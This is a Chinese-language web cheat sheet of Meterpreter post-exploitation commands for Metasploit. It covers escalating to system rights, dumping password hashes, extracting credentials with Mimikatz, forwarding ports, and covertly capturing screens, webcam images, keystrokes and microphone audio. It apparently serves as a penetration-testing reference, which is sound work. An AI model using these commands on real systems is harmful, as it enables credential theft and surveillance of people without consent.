Susu Tools

Meterpreter Cheatsheet

Metasploit 框架中最强大的后渗透载荷命令集,涵盖系统控制、文件操作及提权取证。

基础管理 (Core)

显示帮助菜单
help
已复制到剪贴板
将当前会话放入后台
background
已复制到剪贴板
切换到指定 ID 的会话
sessions -i <id>
已复制到剪贴板
终止当前 Meterpreter 会话
exit / quit
已复制到剪贴板
查看当前运行的用户权限
getuid
已复制到剪贴板
尝试提权至系统权限 (System)
getsystem
已复制到剪贴板
获取目标系统详细信息 (OS, Arch等)
sysinfo
已复制到剪贴板

文件系统交互

列出当前目录文件
ls
已复制到剪贴板
切换目录
cd <dir>
已复制到剪贴板
查看当前工作路径
pwd
已复制到剪贴板
查看文件内容
cat <file>
已复制到剪贴板
上传本地文件到目标
upload <local> <remote>
已复制到剪贴板
从目标下载文件
download <remote> <local>
已复制到剪贴板
在目标系统搜索特定文件
search -f *.txt
已复制到剪贴板
使用 vim 编辑目标上的文件
edit <file>
已复制到剪贴板

系统与后渗透 (Post-Exp)

列出正在运行的进程
ps
已复制到剪贴板
将 Meterpreter 注入到另一个进程
migrate <pid>
已复制到剪贴板
终止指定进程
kill <pid>
已复制到剪贴板
进入目标系统的原生 Shell
shell
已复制到剪贴板
导出目标系统的密码 Hash (需要权限)
hashdump
已复制到剪贴板
加载 Mimikatz 模块 (获取明文密码)
load kiwi
已复制到剪贴板
Kiwi 模块下获取所有凭据
creds_all
已复制到剪贴板

网络与端口转发

查看目标网络配置
ipconfig / ifconfig
已复制到剪贴板
查看/修改目标路由表
route
已复制到剪贴板
本地 8080 转发到目标 80
portfwd add -l 8080 -p 80 -r 127.0.0.1
已复制到剪贴板
查看 ARP 缓存列表
arp
已复制到剪贴板
查看网络连接状态
netstat
已复制到剪贴板

多媒体与取证

抓取目标当前屏幕截图
screenshot
已复制到剪贴板
列出目标摄像头
webcam_list
已复制到剪贴板
使用摄像头拍摄一张照片
webcam_snap
已复制到剪贴板
实时开启摄像头视频流
webcam_stream
已复制到剪贴板
开启键盘记录
keyscan_start
已复制到剪贴板
导出记录的键盘输入
keyscan_dump
已复制到剪贴板
录制麦克风声音 (10秒)
record_mic -d 10
已复制到剪贴板